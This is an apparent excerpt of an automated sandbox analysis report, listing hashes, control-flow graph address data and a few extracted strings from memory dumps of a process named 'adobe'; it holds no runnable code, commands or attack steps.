                                                        • Opcode Fuzzy Hash: 0e93b0deae836a6fe39b37b7b84001ebdaa70babbbc7b9a7b2286cdb9ab47e57
                                                        • Instruction Fuzzy Hash: BC22E4B6E042198FDF74DBA4C5806AEB7B2FF85320F2084A9D425AB395DB31DD41CB90
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f3f7e97a4cd7218a555467268f87244470f5d7afcfc190c07e1776de82fd98e6
                                                        • Instruction ID: 837303ab6dfee938df8c72e257695661f3ccbac01d541b149e420839db5403cb
                                                        • Opcode Fuzzy Hash: f3f7e97a4cd7218a555467268f87244470f5d7afcfc190c07e1776de82fd98e6
                                                        • Instruction Fuzzy Hash: FD62AE74A106098FDF54DB68D554AADB7F2FF88314F1484A9E826EB394EB31EC41CB90
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 45d379d238424c58348946f74116ac8c133b8fbc49e0e7ef67c7ca2b046f42d4
                                                        • Instruction ID: 0005dd9c84aae72252ecf67bd4021f9e08fd966cbb9d45bf989735d24488b494
                                                        • Opcode Fuzzy Hash: 45d379d238424c58348946f74116ac8c133b8fbc49e0e7ef67c7ca2b046f42d4
                                                        • Instruction Fuzzy Hash: C7329074B002098FDF54DBA9D890BADBBB2FB88310F109569E516EB395DB35EC41CB90
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 40c8371c9ab1205a79881a4e4314cdb696b0bcd8a311c3ead09535611c72cede
                                                        • Instruction ID: e57b1d5f081c601c7f0cc5df4534e1ebc9098ab3f440e2905f9fd8aa20240f43
                                                        • Opcode Fuzzy Hash: 40c8371c9ab1205a79881a4e4314cdb696b0bcd8a311c3ead09535611c72cede
                                                        • Instruction Fuzzy Hash: 692280B0E102098BDFA4DF68D5907AEB7B2FB49310F2094A6E425EB395DA35DC818F51

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 6b7ad18-6b7ad36 1 6b7ad38-6b7ad3b 0->1 2 6b7ad55-6b7ad58 1->2 3 6b7ad3d-6b7ad46 1->3 6 6b7ad6c-6b7ad6f 2->6 7 6b7ad5a-6b7ad67 2->7 4 6b7af4f-6b7af86 3->4 5 6b7ad4c-6b7ad50 3->5 14 6b7af88-6b7af8b 4->14 5->2 8 6b7ad71-6b7ad76 6->8 9 6b7ad79-6b7ad7c 6->9 7->6 8->9 12 6b7af35-6b7af3e 9->12 13 6b7ad82-6b7ad85 9->13 12->3 15 6b7af44-6b7af4e 12->15 16 6b7ad87-6b7ad8b 13->16 17 6b7ad96-6b7ad99 13->17 18 6b7afae-6b7afb1 14->18 19 6b7af8d-6b7afa9 14->19 16->15 20 6b7ad91 16->20 21 6b7adbc-6b7adbf 17->21 22 6b7ad9b-6b7adb7 17->22 25 6b7afb3-6b7afbd 18->25 26 6b7afbe-6b7afc1 18->26 19->18 20->17 23 6b7adc1-6b7add4 21->23 24 6b7add9-6b7addc 21->24 22->21 23->24 28 6b7adde-6b7ade7 24->28 29 6b7adec-6b7adee 24->29 30 6b7afc3 call 6b7b26f 26->30 31 6b7afd0-6b7afd3 26->31 28->29 36 6b7adf5-6b7adf8 29->36 37 6b7adf0 29->37 38 6b7afc9-6b7afcb 30->38 33 6b7b23c-6b7b23f 31->33 34 6b7afd9-6b7b014 31->34 42 6b7b241-6b7b245 33->42 43 6b7b250-6b7b252 33->43 49 6b7b207-6b7b21a 34->49 50 6b7b01a-6b7b026 34->50 36->1 41 6b7adfe-6b7ae22 36->41 37->36 38->31 55 6b7af32 41->55 56 6b7ae28-6b7ae37 41->56 42->34 45 6b7b24b 42->45 46 6b7b254 43->46 47 6b7b259-6b7b25c 43->47 45->43 46->47 47->14 48 6b7b262-6b7b26c 47->48 52 6b7b21c 49->52 57 6b7b046-6b7b08a 50->57 58 6b7b028-6b7b041 50->58 52->33 55->12 61 6b7ae4f-6b7ae8a call 6b765e8 56->61 62 6b7ae39-6b7ae3f 56->62 73 6b7b0a6-6b7b0e5 57->73 74 6b7b08c-6b7b09e 57->74 58->52 79 6b7aea2-6b7aeb9 61->79 80 6b7ae8c-6b7ae92 61->80 63 6b7ae43-6b7ae45 62->63 64 6b7ae41 62->64 63->61 64->61 81 6b7b1cc-6b7b1e1 73->81 82 6b7b0eb-6b7b1c6 call 6b765e8 73->82 74->73 92 6b7aed1-6b7aee2 79->92 93 6b7aebb-6b7aec1 79->93 83 6b7ae96-6b7ae98 80->83 84 6b7ae94 80->84 81->49 82->81 83->79 84->79 98 6b7aee4-6b7aeea 92->98 99 6b7aefa-6b7af2b 92->99 95 6b7aec5-6b7aec7 93->95 96 6b7aec3 93->96 95->92 96->92 101 6b7aeee-6b7aef0 98->101 102 6b7aeec 98->102 99->55 101->99 102->99
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq$$eq$$eq$$eq$$eq
                                                        • API String ID: 0-1110479544
                                                        • Opcode ID: 345481112daf6b04d85fc4cdc48c454a50de4a0922707c96614a1a06d8db6d5b
                                                        • Instruction ID: 05ec0057777e58770b561aa159f9bb62cfb1f577b2c681cde89438006176ab79
                                                        • Opcode Fuzzy Hash: 345481112daf6b04d85fc4cdc48c454a50de4a0922707c96614a1a06d8db6d5b
                                                        • Instruction Fuzzy Hash: AFE17170E1020A8FDF95DFA9D5906AEB7B2FF85304F208569E416EB354EB309C46CB91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 254 6b7b6a0-6b7b6c0 255 6b7b6c2-6b7b6c5 254->255 256 6b7b6c7-6b7b6cb 255->256 257 6b7b6ec-6b7b6ef 255->257 258 6b7b6d1-6b7b6e1 256->258 259 6b7ba3f-6b7ba76 256->259 260 6b7b6f1-6b7b6f7 257->260 261 6b7b6fc-6b7b6ff 257->261 272 6b7b6e7 258->272 273 6b7b954-6b7b958 258->273 269 6b7ba78-6b7ba7b 259->269 260->261 262 6b7b701-6b7b716 261->262 263 6b7b73e-6b7b741 261->263 262->259 274 6b7b71c-6b7b739 262->274 265 6b7b743-6b7b748 263->265 266 6b7b74b-6b7b74e 263->266 265->266 270 6b7b750-6b7b759 266->270 271 6b7b75e-6b7b761 266->271 275 6b7ba9e-6b7baa1 269->275 276 6b7ba7d-6b7ba99 269->276 270->271 277 6b7b763-6b7b76c 271->277 278 6b7b77e-6b7b781 271->278 272->257 273->259 279 6b7b95e-6b7b96e 273->279 274->263 280 6b7baa7-6b7bacf 275->280 281 6b7bd0d-6b7bd0f 275->281 276->275 277->259 282 6b7b772-6b7b779 277->282 283 6b7b795-6b7b798 278->283 284 6b7b783-6b7b787 278->284 294 6b7b997-6b7b99b 279->294 295 6b7b970 279->295 340 6b7bad1-6b7bad4 280->340 341 6b7bad9-6b7bb1d 280->341 288 6b7bd16-6b7bd19 281->288 289 6b7bd11 281->289 282->278 291 6b7b7af-6b7b7b2 283->291 292 6b7b79a-6b7b79e 283->292 284->259 290 6b7b78d-6b7b790 284->290 288->269 298 6b7bd1f-6b7bd28 288->298 289->288 290->283 296 6b7b86d-6b7b870 291->296 297 6b7b7b8-6b7b7bb 291->297 292->259 293 6b7b7a4-6b7b7aa 292->293 293->291 294->259 304 6b7b9a1-6b7b9b1 294->304 300 6b7b975-6b7b978 295->300 305 6b7b875-6b7b878 296->305 301 6b7b846-6b7b84f 297->301 302 6b7b7c1-6b7b7c4 297->302 306 6b7b982-6b7b985 300->306 307 6b7b97a-6b7b97d 300->307 310 6b7b855 301->310 311 6b7b9c1-6b7b9ca 301->311 308 6b7b7e6-6b7b7e9 302->308 309 6b7b7c6-6b7b7e1 302->309 304->296 331 6b7b9b7 304->331 312 6b7b89b-6b7b89e 305->312 313 6b7b87a-6b7b896 305->313 317 6b7b987-6b7b98d 306->317 318 6b7b992-6b7b995 306->318 307->306 320 6b7b800-6b7b803 308->320 321 6b7b7eb-6b7b7ef 308->321 309->308 319 6b7b85a-6b7b85d 310->319 311->259 323 6b7b9cc-6b7b9d3 311->323 315 6b7b8b0-6b7b8b3 312->315 316 6b7b8a0-6b7b8ab 312->316 313->312 325 6b7b8b5-6b7b8b9 315->325 326 6b7b8c4-6b7b8c7 315->326 316->315 317->318 318->294 329 6b7b9bc-6b7b9bf 318->329 319->296 328 6b7b85f-6b7b862 319->328 332 6b7b805-6b7b81a 320->332 333 6b7b841-6b7b844 320->333 321->259 330 6b7b7f5-6b7b7fb 321->330 324 6b7b9d8-6b7b9db 323->324 342 6b7b9ed-6b7b9f0 324->342 343 6b7b9dd 324->343 325->270 337 6b7b8bf 325->337 338 6b7b91c-6b7b91f 326->338 339 6b7b8c9-6b7b917 call 6b765e8 326->339 344 6b7b9fb-6b7ba04 328->344 345 6b7b868-6b7b86b 328->345 329->311 329->324 330->320 331->329 332->259 354 6b7b820-6b7b83c 332->354 333->301 333->319 337->326 350 6b7b921-6b7b92a 338->350 351 6b7b92f-6b7b932 338->351 339->338 340->298 373 6b7bb23-6b7bb2c 341->373 374 6b7bd02-6b7bd0c 341->374 342->296 348 6b7b9f6-6b7b9f9 342->348 356 6b7b9e5-6b7b9e8 343->356 344->277 349 6b7ba0a 344->349 345->296 345->305 348->344 357 6b7ba0f-6b7ba12 348->357 349->357 350->351 358 6b7b934-6b7b93d 351->358 359 6b7b942-6b7b945 351->359 354->333 356->342 361 6b7ba14-6b7ba1d 357->361 362 6b7ba22-6b7ba24 357->362 358->359 363 6b7b947-6b7b94c 359->363 364 6b7b94f-6b7b952 359->364 361->362 368 6b7ba26 362->368 369 6b7ba2b-6b7ba2e 362->369 363->364 364->273 364->300 368->369 369->255 370 6b7ba34-6b7ba3e 369->370 376 6b7bb32-6b7bb9e call 6b765e8 373->376 377 6b7bcf8-6b7bcfd 373->377 388 6b7bba4-6b7bba9 376->388 389 6b7bc98-6b7bcad 376->389 377->374 390 6b7bbc5 388->390 391 6b7bbab-6b7bbb1 388->391 389->377 395 6b7bbc7-6b7bbcd 390->395 393 6b7bbb7-6b7bbb9 391->393 394 6b7bbb3-6b7bbb5 391->394 396 6b7bbc3 393->396 394->396 397 6b7bbe2-6b7bbef 395->397 398 6b7bbcf-6b7bbd5 395->398 396->395 405 6b7bc07-6b7bc14 397->405 406 6b7bbf1-6b7bbf7 397->406 399 6b7bc83-6b7bc92 398->399 400 6b7bbdb 398->400 399->388 399->389 400->397 401 6b7bc16-6b7bc23 400->401 402 6b7bc4a-6b7bc57 400->402 414 6b7bc25-6b7bc2b 401->414 415 6b7bc3b-6b7bc48 401->415 411 6b7bc6f-6b7bc7c 402->411 412 6b7bc59-6b7bc5f 402->412 405->399 408 6b7bbfb-6b7bbfd 406->408 409 6b7bbf9 406->409 408->405 409->405 411->399 416 6b7bc63-6b7bc65 412->416 417 6b7bc61 412->417 418 6b7bc2f-6b7bc31 414->418 419 6b7bc2d 414->419 415->399 416->411 417->411 418->415 419->415
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq$$eq$$eq
                                                        • API String ID: 0-220072568
                                                        • Opcode ID: 29030a8c3d2f306ebafd587e5bda136e40c7d05e03ec99cfb9268f5480b4cda7
                                                        • Instruction ID: 122bda659cbb196e4d1eb321bc20f8e91fc1ecbc6a070e789abd5c256a782dac
                                                        • Opcode Fuzzy Hash: 29030a8c3d2f306ebafd587e5bda136e40c7d05e03ec99cfb9268f5480b4cda7
                                                        • Instruction Fuzzy Hash: 4E027CB0E1020A8FDFA4DF69D5806ADB7B2FB45314F2085AAD425EB255DB31EC81CF91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 422 6b79198-6b791bd 423 6b791bf-6b791c2 422->423 424 6b79a80-6b79a83 423->424 425 6b791c8-6b791dd 423->425 426 6b79a85-6b79aa4 424->426 427 6b79aa9-6b79aab 424->427 432 6b791f5-6b7920b 425->432 433 6b791df-6b791e5 425->433 426->427 429 6b79ab2-6b79ab5 427->429 430 6b79aad 427->430 429->423 434 6b79abb-6b79ac5 429->434 430->429 439 6b79216-6b79218 432->439 435 6b791e7 433->435 436 6b791e9-6b791eb 433->436 435->432 436->432 440 6b79230-6b792a1 439->440 441 6b7921a-6b79220 439->441 452 6b792a3-6b792c6 440->452 453 6b792cd-6b792e9 440->453 442 6b79224-6b79226 441->442 443 6b79222 441->443 442->440 443->440 452->453 458 6b79315-6b79330 453->458 459 6b792eb-6b7930e 453->459 464 6b79332-6b79354 458->464 465 6b7935b-6b79376 458->465 459->458 464->465 470 6b7939b-6b793a9 465->470 471 6b79378-6b79394 465->471 472 6b793ab-6b793b4 470->472 473 6b793b9-6b79433 470->473 471->470 472->434 479 6b79435-6b79453 473->479 480 6b79480-6b79495 473->480 484 6b79455-6b79464 479->484 485 6b7946f-6b7947e 479->485 480->424 484->485 485->479 485->480
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq$$eq
                                                        • API String ID: 0-812946093
                                                        • Opcode ID: c8d86d8e3f609298edd5a76df90368c6c2f7ce98b07f50cb71c30df0515ac1b1
                                                        • Instruction ID: cf333234d3978456d7e51f3e980ed9e9f362e732b5b804083ed1fba7fd68ea04
                                                        • Opcode Fuzzy Hash: c8d86d8e3f609298edd5a76df90368c6c2f7ce98b07f50cb71c30df0515ac1b1
                                                        • Instruction Fuzzy Hash: 82914F74F0061A8FDF54EF79D950BAEB7F6FB84200F1085A9D419EB358EA30AD418B91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 488 6b7cfa0-6b7cfbb 489 6b7cfbd-6b7cfc0 488->489 490 6b7cfc2-6b7d004 489->490 491 6b7d009-6b7d00c 489->491 490->491 492 6b7d055-6b7d058 491->492 493 6b7d00e-6b7d050 491->493 495 6b7d075-6b7d078 492->495 496 6b7d05a-6b7d070 492->496 493->492 498 6b7d0c1-6b7d0c4 495->498 499 6b7d07a-6b7d089 495->499 496->495 503 6b7d0c6-6b7d108 498->503 504 6b7d10d-6b7d110 498->504 500 6b7d08b-6b7d090 499->500 501 6b7d098-6b7d0a4 499->501 500->501 507 6b7d9bd-6b7d9d0 501->507 508 6b7d0aa-6b7d0bc 501->508 503->504 509 6b7d112-6b7d154 504->509 510 6b7d159-6b7d15c 504->510 525 6b7d9d2-6b7d9dd 507->525 526 6b7d9de-6b7d9f6 507->526 508->498 509->510 512 6b7d162-6b7d165 510->512 513 6b7d48c-6b7d498 510->513 518 6b7d167-6b7d1a9 512->518 519 6b7d1ae-6b7d1b1 512->519 513->499 517 6b7d49e-6b7d78b 513->517 703 6b7d9b2-6b7d9bc 517->703 704 6b7d791-6b7d797 517->704 518->519 523 6b7d1b3-6b7d1b8 519->523 524 6b7d1bb-6b7d1be 519->524 523->524 529 6b7d207-6b7d20a 524->529 530 6b7d1c0-6b7d1cf 524->530 525->526 531 6b7d9f8-6b7d9fb 526->531 541 6b7d253-6b7d256 529->541 542 6b7d20c-6b7d24e 529->542 537 6b7d1d1-6b7d1d6 530->537 538 6b7d1de-6b7d1ea 530->538 539 6b7d9fd call 6b7db15 531->539 540 6b7da0a-6b7da0d 531->540 537->538 538->507 545 6b7d1f0-6b7d202 538->545 553 6b7da03-6b7da05 539->553 548 6b7da30-6b7da33 540->548 549 6b7da0f-6b7da2b 540->549 546 6b7d279-6b7d27c 541->546 547 6b7d258-6b7d274 541->547 542->541 545->529 554 6b7d27e-6b7d280 546->554 555 6b7d28b-6b7d28e 546->555 547->546 556 6b7da66-6b7da68 548->556 557 6b7da35-6b7da61 548->557 549->548 553->540 564 6b7d347-6b7d350 554->564 565 6b7d286 554->565 566 6b7d2d7-6b7d2da 555->566 567 6b7d290-6b7d2d2 555->567 568 6b7da6f-6b7da72 556->568 569 6b7da6a 556->569 557->556 572 6b7d352-6b7d357 564->572 573 6b7d35f-6b7d36b 564->573 565->555 576 6b7d2dc-6b7d2de 566->576 577 6b7d2e9-6b7d2ec 566->577 567->566 568->531 574 6b7da74-6b7da83 568->574 569->568 572->573 584 6b7d371-6b7d385 573->584 585 6b7d47c-6b7d481 573->585 600 6b7da85-6b7dae8 call 6b765e8 574->600 601 6b7daea-6b7daff 574->601 587 6b7d2e4 576->587 588 6b7d489 576->588 589 6b7d335-6b7d337 577->589 590 6b7d2ee-6b7d330 577->590 584->588 605 6b7d38b-6b7d39d 584->605 585->588 587->577 588->513 592 6b7d33e-6b7d341 589->592 593 6b7d339 589->593 590->589 592->489 592->564 593->592 600->601 611 6b7db00 601->611 616 6b7d3c1-6b7d3c3 605->616 617 6b7d39f-6b7d3a5 605->617 611->611 622 6b7d3cd-6b7d3d9 616->622 620 6b7d3a7 617->620 621 6b7d3a9-6b7d3b5 617->621 625 6b7d3b7-6b7d3bf 620->625 621->625 634 6b7d3e7 622->634 635 6b7d3db-6b7d3e5 622->635 625->622 636 6b7d3ec-6b7d3ee 634->636 635->636 636->588 639 6b7d3f4-6b7d410 call 6b765e8 636->639 648 6b7d412-6b7d417 639->648 649 6b7d41f-6b7d42b 639->649 648->649 649->585 651 6b7d42d-6b7d47a 649->651 651->588 705 6b7d7a6-6b7d7af 704->705 706 6b7d799-6b7d79e 704->706 705->507 707 6b7d7b5-6b7d7c8 705->707 706->705 709 6b7d9a2-6b7d9ac 707->709 710 6b7d7ce-6b7d7d4 707->710 709->703 709->704 711 6b7d7d6-6b7d7db 710->711 712 6b7d7e3-6b7d7ec 710->712 711->712 712->507 713 6b7d7f2-6b7d813 712->713 716 6b7d815-6b7d81a 713->716 717 6b7d822-6b7d82b 713->717 716->717 717->507 718 6b7d831-6b7d84e 717->718 718->709 721 6b7d854-6b7d85a 718->721 721->507 722 6b7d860-6b7d879 721->722 724 6b7d995-6b7d99c 722->724 725 6b7d87f-6b7d8a6 722->725 724->709 724->721 725->507 728 6b7d8ac-6b7d8b6 725->728 728->507 729 6b7d8bc-6b7d8d3 728->729 731 6b7d8d5-6b7d8e0 729->731 732 6b7d8e2-6b7d8fd 729->732 731->732 732->724 737 6b7d903-6b7d91c call 6b765e8 732->737 741 6b7d91e-6b7d923 737->741 742 6b7d92b-6b7d934 737->742 741->742 742->507 743 6b7d93a-6b7d98e 742->743 743->724
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq$$eq
                                                        • API String ID: 0-177832560
                                                        • Opcode ID: 977f48c4e7054259b886fc02d456368c18d8522543976aaf122f7ca8683c4493
                                                        • Instruction ID: 8f7c4ad6e77fdd88356449d2cf752493bf288bc10e74eb9ed3374f3e1efbe422
                                                        • Opcode Fuzzy Hash: 977f48c4e7054259b886fc02d456368c18d8522543976aaf122f7ca8683c4493
                                                        • Instruction Fuzzy Hash: 29625370A0061A8FCB55EB79D590A5EB7F2FF84344B108A68D0169F359EB31FC86CB91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 751 6b74bb0-6b74bd4 752 6b74bd6-6b74bd9 751->752 753 6b74bdb-6b74bf5 752->753 754 6b74bfa-6b74bfd 752->754 753->754 755 6b74c03-6b74cfb 754->755 756 6b752dc-6b752de 754->756 774 6b74d01-6b74d4e call 6b7545a 755->774 775 6b74d7e-6b74d85 755->775 758 6b752e5-6b752e8 756->758 759 6b752e0 756->759 758->752 760 6b752ee-6b752fb 758->760 759->758 788 6b74d54-6b74d70 774->788 776 6b74d8b-6b74dfb 775->776 777 6b74e09-6b74e12 775->777 794 6b74e06 776->794 795 6b74dfd 776->795 777->760 791 6b74d72 788->791 792 6b74d7b 788->792 791->792 792->775 794->777 795->794
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: fjq$XPjq$\Ojq
                                                        • API String ID: 0-216941231
                                                        • Opcode ID: d78be9a8d73293618d5eaccd0c34db11d31c70c738890e109c708e7b4d304542
                                                        • Instruction ID: c3ee2434a4fcd8c48eabfb9e103a2a0ff6d97ae870d1281501c933fe04988892
                                                        • Opcode Fuzzy Hash: d78be9a8d73293618d5eaccd0c34db11d31c70c738890e109c708e7b4d304542
                                                        • Instruction Fuzzy Hash: 80619170F102199FEB599FA8C8147AEBBF6FF88700F208129D116AB394DB755C418B90

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1042 6b79188-6b791bd 1044 6b791bf-6b791c2 1042->1044 1045 6b79a80-6b79a83 1044->1045 1046 6b791c8-6b791dd 1044->1046 1047 6b79a85-6b79aa4 1045->1047 1048 6b79aa9-6b79aab 1045->1048 1053 6b791f5-6b7920b 1046->1053 1054 6b791df-6b791e5 1046->1054 1047->1048 1050 6b79ab2-6b79ab5 1048->1050 1051 6b79aad 1048->1051 1050->1044 1055 6b79abb-6b79ac5 1050->1055 1051->1050 1060 6b79216-6b79218 1053->1060 1056 6b791e7 1054->1056 1057 6b791e9-6b791eb 1054->1057 1056->1053 1057->1053 1061 6b79230-6b792a1 1060->1061 1062 6b7921a-6b79220 1060->1062 1073 6b792a3-6b792c6 1061->1073 1074 6b792cd-6b792e9 1061->1074 1063 6b79224-6b79226 1062->1063 1064 6b79222 1062->1064 1063->1061 1064->1061 1073->1074 1079 6b79315-6b79330 1074->1079 1080 6b792eb-6b7930e 1074->1080 1085 6b79332-6b79354 1079->1085 1086 6b7935b-6b79376 1079->1086 1080->1079 1085->1086 1091 6b7939b-6b793a9 1086->1091 1092 6b79378-6b79394 1086->1092 1093 6b793ab-6b793b4 1091->1093 1094 6b793b9-6b79433 1091->1094 1092->1091 1093->1055 1100 6b79435-6b79453 1094->1100 1101 6b79480-6b79495 1094->1101 1105 6b79455-6b79464 1100->1105 1106 6b7946f-6b7947e 1100->1106 1101->1045 1105->1106 1106->1100 1106->1101
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $eq$$eq
                                                        • API String ID: 0-2246304398
                                                        • Opcode ID: a7390dc6914a54878b37a8a1b6e7903fdef230148a5ae0207659ea4c33b56d2d
                                                        • Instruction ID: 005de3f792e3f55448cddeaa9fe460fe7c79820dbf2f045c85725b5a42205698
                                                        • Opcode Fuzzy Hash: a7390dc6914a54878b37a8a1b6e7903fdef230148a5ae0207659ea4c33b56d2d
                                                        • Instruction Fuzzy Hash: 09517374B006199FDF54EB78D9A4BAE73F6FB88200F108569D419D73ACEA30EC418B91

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1109 6b74ba0-6b74bd4 1111 6b74bd6-6b74bd9 1109->1111 1112 6b74bdb-6b74bf5 1111->1112 1113 6b74bfa-6b74bfd 1111->1113 1112->1113 1114 6b74c03-6b74cfb 1113->1114 1115 6b752dc-6b752de 1113->1115 1133 6b74d01-6b74d4e call 6b7545a 1114->1133 1134 6b74d7e-6b74d85 1114->1134 1117 6b752e5-6b752e8 1115->1117 1118 6b752e0 1115->1118 1117->1111 1119 6b752ee-6b752fb 1117->1119 1118->1117 1147 6b74d54-6b74d70 1133->1147 1135 6b74d8b-6b74dfb 1134->1135 1136 6b74e09-6b74e12 1134->1136 1153 6b74e06 1135->1153 1154 6b74dfd 1135->1154 1136->1119 1150 6b74d72 1147->1150 1151 6b74d7b 1147->1151 1150->1151 1151->1134 1153->1136 1154->1153
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: fjq$XPjq
                                                        • API String ID: 0-1938862144
                                                        • Opcode ID: 4b5df5acf14d545de0229c20f137eddc410f35d11d3d38507978f9ea82688183
                                                        • Instruction ID: f1ee29b9b54616447391339bda5a18e25c4b4d8a831f84934ff8a3a10e43ae33
                                                        • Opcode Fuzzy Hash: 4b5df5acf14d545de0229c20f137eddc410f35d11d3d38507978f9ea82688183
                                                        • Instruction Fuzzy Hash: 83519474F102199FDB559FA9C854BAEBBF7FF88700F208529D115AB394DB709C418B90

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1336 13aed40-13aed5b 1337 13aed5d-13aed84 1336->1337 1338 13aed85-13aed9b 1336->1338 1359 13aed9d call 13aee28 1338->1359 1360 13aed9d call 13aed40 1338->1360 1341 13aeda2-13aeda4 1342 13aedaa-13aee09 1341->1342 1343 13aeda6-13aeda9 1341->1343 1350 13aee0b-13aee0e 1342->1350 1351 13aee0f-13aee9c GlobalMemoryStatusEx 1342->1351 1355 13aee9e-13aeea4 1351->1355 1356 13aeea5-13aeecd 1351->1356 1355->1356 1359->1341 1360->1341
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1784478751.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13a0000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c2df36bc75c70c108aa47c80ca64eb9380b235f7b1e283e7312ecaedc61c0c8d
                                                        • Instruction ID: 204aba830783915c48422b027e98b107f5dda8cebe9177de772cbdf1fe3b20c1
                                                        • Opcode Fuzzy Hash: c2df36bc75c70c108aa47c80ca64eb9380b235f7b1e283e7312ecaedc61c0c8d
                                                        • Instruction Fuzzy Hash: 4A412372D043598FCB14DF69D8047EEBBF5EF88310F14866AD509AB290DB789845CBE0

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1440 13aee28-13aee9c GlobalMemoryStatusEx 1442 13aee9e-13aeea4 1440->1442 1443 13aeea5-13aeecd 1440->1443 1442->1443
                                                        APIs
                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 013AEE8F
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1784478751.00000000013A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13a0000_adobe.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemoryStatus
                                                        • String ID:
                                                        • API String ID: 1890195054-0
                                                        • Opcode ID: 925989009fc96b65fd58d78a2e287abe84fbcb969a264569ca05783fbf85dee2
                                                        • Instruction ID: 81549d3e308d811f659a71afbfc007141cefebbbb3a6fddd7041faeecee1b4b8
                                                        • Opcode Fuzzy Hash: 925989009fc96b65fd58d78a2e287abe84fbcb969a264569ca05783fbf85dee2
                                                        • Instruction Fuzzy Hash: 2D111FB1C006599FDB10CFAAC444A9EFBF8EF48324F15812AD918A7240D378A944CFA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.1798962946.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_6b70000_adobe.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PHeq
                                                        • API String ID: 0-2873676430
                                                        • Opcode ID: d5307c803ebf18555a0fcb2119090d01431c3d709e81550ffb7af96b4cf18037
